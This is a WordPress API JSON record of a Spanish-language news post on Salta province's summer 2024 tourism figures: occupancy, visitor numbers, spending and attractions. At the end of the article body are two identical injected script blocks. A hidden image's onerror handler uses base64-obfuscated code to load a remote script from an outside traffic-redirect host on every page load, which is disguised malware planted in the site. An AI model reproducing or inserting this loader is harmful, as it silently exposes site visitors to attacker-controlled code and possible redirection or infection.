{"id":3820,"date":"2024-03-06T20:53:46","date_gmt":"2024-03-06T23:53:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3820"},"modified":"2025-08-13T23:59:05","modified_gmt":"2025-08-14T02:59:05","slug":"los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3820","title":{"rendered":"Los turistas volvieron a elegir a Salta: Ocupaci\u00f3n del 50% y un impacto econ\u00f3mico superior a los 160 mil millones en este verano"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-58577792f9d2554864b172d31b1e575b\" style=\"background-color:#c2276d\"><em>En un contexto complejo, el nivel de ocupaci\u00f3n hotelera se ubic\u00f3 en porcentajes similares a los del verano de 2023, con un incremento del 15% de la oferta de plazas. Es el primer balance donde se emplea la herramienta de Big Data de Telecom.<\/em><\/h5>\n\n\n\n<p>El vicegobernador&nbsp;<strong>Antonio<\/strong>&nbsp;<strong>Marocco<\/strong>&nbsp;y el ministro de Turismo y Deportes&nbsp;<strong>Mario<\/strong>&nbsp;<strong>Pe\u00f1a<\/strong>&nbsp;encabezaron esta ma\u00f1ana una reuni\u00f3n en la que se present\u00f3 el balance de la temporada de verano, que este a\u00f1o determin\u00f3 un impacto econ\u00f3mico de 168.803 millones de pesos en la actividad tur\u00edstica.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"560\" height=\"350\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/94515-los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano-1.jpg\" alt=\"\" class=\"wp-image-3824\" style=\"width:354px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/94515-los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano-1.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/94515-los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano-1-300x188.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure><\/div>\n\n\n<p>Al respecto, Pe\u00f1a destac\u00f3 que para la evaluaci\u00f3n de la temporada de verano se hizo por primera vez a partir de estad\u00edsticas obtenidas por Big Data Mobility Insights, a partir de un convenio firmado con Telecom. \u201cSomos la primera provincia de la Argentina en manejar estad\u00edsticas de esta manera, lo que nos brinda muchas herramientas para definir nuevas estrategias\u201d. Otras fuentes de informaci\u00f3n que se utilizaron fueron un relevamiento hotelero diario y encuestas de perfil del turista realizadas en forma colaborativa con las oficinas de informaci\u00f3n tur\u00edstica.<\/p>\n\n\n\n<p>Por otra parte, Pe\u00f1a se\u00f1al\u00f3 la importancia de haber logrado sostener la ocupaci\u00f3n en un momento tan complejo de pa\u00eds. En Salta en relaci\u00f3n al 2023 hubo un descenso de menos de un punto porcentual en los n\u00fameros de visitantes: \u201chay una situaci\u00f3n complicada, vamos a seguir trabajando en conjunto, como nos pide el Gobernador, con todos los municipios, con todos los actores claves del sector privado, para lograr este a\u00f1o sostener el nivel de actividad, ya que son miles los puestos de trabajo\u201d, indic\u00f3.&nbsp;&nbsp;<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo&nbsp;<strong>Juan<\/strong>&nbsp;<strong>Lucero<\/strong>&nbsp;tambi\u00e9n brind\u00f3 la visi\u00f3n desde el sector privado, se\u00f1al\u00f3 que \u201csab\u00edamos que ser\u00eda una temporada at\u00edpica, pero se ha trabajado. Apuntalamos la temporada con una promoci\u00f3n 3&#215;2 para incentiva la demanda, con acciones puntuales en mercados de cercan\u00eda, algo que dio sus frutos\u201d. El empresario indic\u00f3 que \u201chay una baja en el consumo que hace el turismo, pero el sector privado y el p\u00fablico contin\u00faan con el trabajo en conjunto\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n destac\u00f3 la utilizaci\u00f3n de herramientas tecnol\u00f3gicas para los relevamientos \u201cporque nos permitir\u00e1 hacer un uso m\u00e1s eficiente de los recursos y saber a ciencia cierta d\u00f3nde tenemos que apuntar como sector privado\u201d. .<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11184-los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11184-los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano.jpg\" alt=\"Los turistas volvieron a elegir a Salta: Ocupaci\u00f3n del 50% y un impacto econ\u00f3mico superior a los 160 mil millones en este verano\" style=\"width:320px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Indicadores<\/strong>&nbsp;<strong>destacados<\/strong><\/p>\n\n\n\n<p>La secretaria de Turismo Nadia Loza inform\u00f3 que llegaron a Salta 393.708 visitantes en enero con una tasa de ocupaci\u00f3n de 50.8% y 361490 en febrero con una tasa de ocupaci\u00f3n de 50.3%, con un promedio de temporada de 50,6%.<\/p>\n\n\n\n<p>Esta microsegmentaci\u00f3n de origen determin\u00f3 que de las ciudades que mayor cantidad de visitantes llegaron son San Miguel de Tucum\u00e1n, Ciudad de C\u00f3rdoba, San Salvador de Jujuy, lugares en donde se realizaron importantes acciones de promoci\u00f3n.<\/p>\n\n\n\n<p>En cuanto a visitantes internacionales, los estudios realizados dieron como resultado que mayoritariamente llegaron a Salta desde Brasil, Uruguay y Francia, es importante destacar a conectividad con Brasil. Un dato importante es que se alcanz\u00f3 el 20% de turistas internacionales, porcentaje que era el m\u00e1ximo hist\u00f3rico de la provincia.&nbsp;<\/p>\n\n\n\n<p>Los visitantes tuvieron un pernocte promedio de 4.3 noches y un gasto promedio de $55.202; y la fidelidad con Salta asciende a un 53%; la provincia fue mayoritariamente visitada por familias, 40.1% y con pareja 35.7% quienes llegaron en un 53.8% en autom\u00f3vil particular y un 26.8% en avi\u00f3n.<\/p>\n\n\n\n<p>En cuanto a las atracciones visitadas en la Ciudad de Salta, el Tren a las Nubes transport\u00f3 en la temporada a 6.636 pasajeros y el Telef\u00e9rico San Bernardo a 63.915. En tanto, los lugares m\u00e1s visitados en la provincia fueron Rosario de la Frontera, Cachi, Molinos, San Antonio de los Cobres, La Caldera, Cafayate, Coronel Moldes, Ciudad de Salta, Seclant\u00e1s y San Lorenzo.&nbsp;<\/p>\n\n\n\n<p>Estuvieron presentes: el presidente de la C\u00e1mara de Turismo Juan Lucero, la presidenta de AHT Mariana Farjat, el vicepresidente de la C\u00e1mara Gastron\u00f3mica de Salta Juan Chib\u00e1n, la presidenta de INPROTUR Manuela Arancibia, el vicepresidente del Bureau Patricio Barbar\u00e1n y el director Tom\u00e1s Hannach del Telef\u00e9rico San Bernardo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/los-turistas-volvieron-a-elegir-a-salta-ocupacion-del-50-y-un-impacto-economico-superior-a-los-160-mil-millones-en-este-verano-94515\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En un contexto complejo, el nivel de ocupaci\u00f3n hotelera se ubic\u00f3 en porcentajes similares a los del verano de 2023, con un incremento del 15% de la oferta de plazas. Es el primer balance donde se emplea la herramienta de Big Data de Telecom. El vicegobernador&nbsp;Antonio&nbsp;Marocco&nbsp;y el ministro de Turismo y Deportes&nbsp;Mario&nbsp;Pe\u00f1a&nbsp;encabezaron esta ma\u00f1ana una [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3823,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3820","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3820"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3820"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3820\/revisions"}],"predecessor-version":[{"id":6831,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3820\/revisions\/6831"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3823"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3820"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3820"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3820"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}